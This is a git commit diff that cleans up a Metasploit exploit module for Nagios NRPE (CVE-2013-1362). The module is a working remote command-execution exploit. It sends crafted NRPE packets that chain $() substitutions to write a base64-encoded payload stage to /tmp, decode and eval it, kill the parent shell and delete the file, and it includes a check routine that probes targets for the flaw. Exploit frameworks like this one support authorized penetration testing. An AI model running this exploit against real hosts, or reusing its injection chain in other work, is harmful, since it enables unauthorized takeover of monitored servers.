Merge pull request #1 from jvazquez-r7/nagios_nrpe_work

cleanup for nagios_nrpe_arguments

Author: tinfoil-globe

modules/exploits/linux/misc/nagios_nrpe_arguments.rb

@@ -14,37 +14,33 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::Remote::Tcp
 
-	# would like to replace these globals how would I do that?
-	@ssl_socket = nil
-	@force_ssl = false
 	def initialize(info = {})
 		super(update_info(info,
-			'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
+			'Name'        => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
 			'Description' => %q{
 					The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
-					Nagios server to actively poll information from the hosts it monitors. NRPE
-					has a configuration option dont_blame_nrpe (with a caveat above it ENABLING
-					THIS OPTION IS A SECURITY RISK!) which enables command-line arguments to be
-					provided remote plugins. This option is often enabled, and while NRPE makes
-					an effort to sanitize arguments to prevent command execution, it is possible
-					to execute arbitrary commands. },
-			'DefaultOptions' => {
-					'EXITFUNC' => 'process',
-					'PrependFork' => 'yes',
-					'AppendExit' => 'yes',
-
-				},
-			'Author' => [
-					'jwpari <jwpari[at]beersec.org>'
+				Nagios server to actively poll information from the hosts it monitors. NRPE
+				has a configuration option dont_blame_nrpe which enables command-line arguments
+				to be provided remote plugins. When this option is enabled, even when NRPE makes
+				an effort to sanitize arguments to prevent command execution, it is possible to
+				execute arbitrary commands.
+			},
+			'Author'      =>
+				[
+					'Rudolph Pereir', # Vulnerability discovery
+					'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module
 				],
-			'References' => [
-					[ 'CVE', '2012-5194'],
-					[ 'CVE', '2013-1362'],
+			'References'  =>
+				[
+					[ 'CVE', '2013-1362' ],
+					[ 'OSVDB', '90582'],
+					[ 'BID', '58142'],
+					[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
 				],
-			'License' => MSF_LICENSE,
-			'Platform' => [ 'unix' ],
-			'Arch' => [ ARCH_CMD ],
-			'Payload'        =>
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Payload'     =>
 				{
 					'DisableNops' => true,
 					'Compat'      =>
@@ -54,32 +50,36 @@ def initialize(info = {})
 							# *_perl, *_python and *_ruby work if they are installed
 						}
 				},
-			'Targets' => [
-					['Nagios Remote Plugin Executor prior to 2.14', {}]
+			'Targets'     =>
+				[
+					[ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
 				],
 			'DefaultTarget' => 0,
-			'DisclosureDate' => 'Sep 23 2012'
+			'DisclosureDate' => 'Feb 21 2013'
 		))
 
 		register_options(
 			[
 				Opt::RPORT(5666),
-				OptString.new('CMD', [ true,  "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg", 'check_procs']),
+				OptEnum.new('NRPECMD', [
+					true,
+					"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
+					'check_procs',
+					['check_procs', 'check_users', 'check_load', 'check_disk']
+				]),
 				# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
 				OptBool.new('NRPESSL', [ true,  "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
 			], self.class)
 	end
 
-	def send_message(sock, message)
-		checksum = 0
-
+	def send_message(message)
 		packet = [
-			2,		# packet version
-			1,		# packet type, 1 => query packet
-			0,		# checksum, to be added later
-			0,		# result code, discarded for query packet
-			message,	# the command and arguments
-			0		# padding
+			2,       # packet version
+			1,       # packet type, 1 => query packet
+			0,       # checksum, to be added later
+			0,       # result code, discarded for query packet
+			message, # the command and arguments
+			0        # padding
 		]
 		packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum
 		begin
@@ -92,61 +92,56 @@ def send_message(sock, message)
 		return res.unpack("nnNnA1024n")[4] unless res.nil?
 	end
 
+	def setup
+		@ssl_socket = nil
+		@force_ssl = false
+		super
+	end
+
 	def exploit
 
 		if check != Exploit::CheckCode::Vulnerable
 			fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
 		end
 
-		self.connect
-		print_status("Sending request...")
-
-		elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
-
 		stage = "setsid nohup #{payload.encoded} & "
-
 		stage = Rex::Text.encode_base64(stage)
-
 		# NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
-
-		command = datastore['CMD']
+		command = datastore['NRPECMD']
 		command << "!"
 		command << "$($(rm -f /tmp/$$)" 	# Delete the file if it exists
-
 		# need a way to write to a file without using redirection (>)
 		# cant count on perl being on all linux hosts, use GNU Sed
 		# TODO: Probably a better way to do this, some hosts may not have a /tmp
 		command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text
 		command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file
 		command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage
 		command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right?
-		command << "$(kill -9 $$))" # kill check_procs parent (popen'd sh) so that it never executes
-		send_message(sock, command)
-		handler
-		self.disconnect
-
+		command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes
+		command << "$(rm -f /tmp/$$))" # clean the file with the stage
+		connect
+		print_status("Sending request...")
+		send_message(command)
+		disconnect
 	end
 
 	def check
-
-		print_status("Checking if remote nrpe supports command line arguments")
+		print_status("Checking if remote NRPE supports command line arguments")
 
 		begin
 			# send query asking to run "fake_check" command with command substitution in arguments
-			self.connect
-			res = send_message(sock, "__fake_check!$()")
+			connect
+			res = send_message("__fake_check!$()")
 			# if nrpe is configured to support arguments and is not patched to add $() to
 			# NASTY_META_CHARS then the service will return:
 			#  NRPE: Command '__fake_check' not defined
 			if res =~ /not defined/
-			return Exploit::CheckCode::Vulnerable
-		end
-
+				return Exploit::CheckCode::Vulnerable
+			end
 		# Otherwise the service will close the connection if it is configured to disable arguments
 		rescue EOFError => eof
 			return Exploit::CheckCode::Safe
 		rescue Errno::ECONNRESET => reset
-
 			unless datastore['NRPESSL'] or @force_ssl
 				print_status("Retrying with ADH SSL")
 				@force_ssl = true
@@ -185,6 +180,7 @@ def connect(global = true, opts={})
 
 		return self.sock
 	end
+
 	def disconnect
 		@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl
 		super